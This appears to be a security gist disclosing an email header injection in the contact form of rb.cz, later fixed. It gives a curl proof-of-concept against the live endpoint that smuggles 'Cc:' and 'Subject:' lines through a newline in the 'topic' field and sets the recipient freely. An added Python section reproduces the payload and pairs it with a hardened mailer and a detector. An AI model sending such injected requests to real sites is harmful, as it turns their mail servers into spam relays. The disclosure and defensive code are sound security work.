@spaze
Last active August 29, 2015 14:18
rb.cz email injection (working until new website got deployed 2015-04-02, vulnerable since 2011 at least, reported at least in 2013, 2014)
Received: (qmail 23343 invoked by uid 1013); 31 Oct 2013 16:45:31 -0000
Received: from no-reply@rb.cz by smtp by uid 0 with qmail-scanner-1.22
( Clear:RC:0(62.168.6.253):.
Processed in 0.011431 secs); 31 Oct 2013 16:45:31 -0000
Received: from smtp2.rb.cz (62.168.6.253)
by smtp.example.com with SMTP; 31 Oct 2013 16:45:31 -0000
Received: from sv72-wwwjbo2-al-02 (unknown [172.18.8.181])
by smtp2.rb.cz (Postfix) with ESMTP id 2AF4D18038D
for <spam@example.com>; Thu, 31 Oct 2013 17:45:31 +0100 (CET)
From: no-reply@rb.cz
To: spam@example.com
Message-ID: <10904531.1051383237931149.JavaMail.jboss@172.18.0.139>
Subject: Email z formulare "Kontaktujte nas - lide" - foo
CC: spam@example.net
Subject: waldo
BODY
-----
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
=C3=9Adaje vypln=C4=9Bn=C3=A9 a odeslan=C3=A9 klientem z webov=C3=A9ho form=
ul=C3=A1=C5=99e.
Jm=C3=A9no a p=C5=99=C3=ADjmen=C3=AD: foo bar
Telefon:=20
E-mail: foo@example.com
T=C3=A9ma: foo
BODY
-----
Kontaktn=C3=AD pobo=C4=8Dka:=20
V=C3=A1=C5=A1 dotaz:
curl "http://www.rb.cz/views/pages/send-mail-contact-us/" \
--form "to=spam@example.com" \
--form "topic=foo
Cc:spam@example.net
Subject: waldo
BODY
-----" \
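The request above works because the form's `topic` value is pasted into the `Subject:` line of the outgoing mail, so an embedded newline ends that header and every following line (`Cc:`, a second `Subject:`, the `BODY` marker) is read by the mail stack as part of the header block. The gist also shows the `to` field being chosen by the client. The following Python is an added example (not code from the gist or from rb.cz): a naive mailer that reproduces the effect, a hardened one that takes the recipient from a server-side allow-list and refuses line breaks in header-bound fields, and a small parser-based check a defender can run over a mailbox. The `example.test` addresses, the branch table and the form values are constructed; only the field names `to` and `topic` are taken from the curl request.

```python
"""Email header injection via a contact form: a naive mailer beside a hardened one.

Added example, not code from the gist or from rb.cz. The field names "to" and
"topic" mirror the curl request in the gist; the example.test addresses, the
branch allow-list and the form values below are constructed for illustration.
"""
from email import message_from_bytes, policy
from email.message import EmailMessage

SENDER = "no-reply@example.test"

# Constructed: the server, not the client, decides where a submission goes.
# The form may only name a branch key; the real mailbox is looked up here.
BRANCH_MAILBOXES = {
    "prague": "contact-prague@example.test",
    "brno": "contact-brno@example.test",
}

# Constructed payload with the same shape as the gist's "topic" value:
# the newlines end the Subject line and smuggle further header lines.
INJECTED_TOPIC = "foo\nCc: spam@example.net\nSubject: waldo\nBODY\n-----"


class HeaderInjectionError(ValueError):
    """Raised when a form value headed for a mail header contains CR, LF or NUL."""


def header_safe(value: str) -> str:
    # A header value ends at the first CR/LF, so any such character lets the
    # client start a new header line. Reject rather than strip, so the attempt
    # shows up in the application's logs.
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjectionError(f"control character in header field: {value!r}")
    return value


def build_naive(fields: dict, to_addr: str) -> bytes:
    """Vulnerable: values are pasted straight into the header block and the
    recipient comes from the client. Kept here only to show the effect."""
    headers = (
        f"From: {SENDER}\r\n"
        f"To: {to_addr}\r\n"
        f"Subject: Contact form - {fields['topic']}\r\n"
    )
    body = (
        f"Name: {fields['name']}\n"
        f"E-mail: {fields['email']}\n"
        f"Topic: {fields['topic']}\n"
    )
    return (headers + "\r\n" + body).encode("utf-8")


def build_hardened(fields: dict, branch: str) -> bytes:
    """Safe: recipient from the server-side allow-list, every header-bound value
    checked for line breaks, message assembled by the email library (whose
    default policy also refuses multi-line header values)."""
    try:
        to_addr = BRANCH_MAILBOXES[branch]
    except KeyError:
        raise ValueError(f"unknown branch: {branch!r}") from None
    msg = EmailMessage()
    msg["From"] = SENDER
    msg["To"] = to_addr
    msg["Subject"] = "Contact form - " + header_safe(fields["topic"])
    # Body text is free-form; line breaks there cannot create headers.
    msg.set_content(
        f"Name: {fields['name']}\nE-mail: {fields['email']}\nTopic: {fields['topic']}\n"
    )
    return msg.as_bytes()


def submit(fields: dict, branch: str) -> tuple:
    """Form-handler wrapper: (True, raw message text) or (False, reason)."""
    try:
        return True, build_hardened(fields, branch).decode("utf-8")
    except ValueError as exc:  # HeaderInjectionError is a ValueError too
        return False, str(exc)


def header_summary(raw: bytes) -> dict:
    """What a receiving MTA sees. A contact form sets exactly one Subject and
    no Cc, so anything else means a form field reached the header block."""
    msg = message_from_bytes(raw, policy=policy.default)
    return {
        "to": [str(v) for v in msg.get_all("To", [])],
        "cc": [str(v) for v in msg.get_all("Cc", [])],
        "subjects": [str(v) for v in msg.get_all("Subject", [])],
        "body_first_line": msg.get_payload().splitlines()[0],
    }


def looks_injected(raw: bytes) -> bool:
    """Cheap mailbox-side detector for the pattern the gist demonstrates."""
    s = header_summary(raw)
    return len(s["subjects"]) != 1 or bool(s["cc"])


if __name__ == "__main__":
    hostile = {"name": "foo bar", "email": "foo@example.com", "topic": INJECTED_TOPIC}
    print(header_summary(build_naive(hostile, "spam@example.com")))
    print(submit(hostile, "prague"))
    print(submit({**hostile, "topic": "foo"}, "prague"))
```

Running the block prints the naive mail's header view (two `Subject` values and an attacker-supplied `Cc`), the hardened handler's rejection of the same input, and a clean submission routed to the allow-listed branch mailbox. Rejecting instead of silently stripping the line breaks is deliberate: a stripped payload still sends a mail, while a rejection leaves a log entry to alert on.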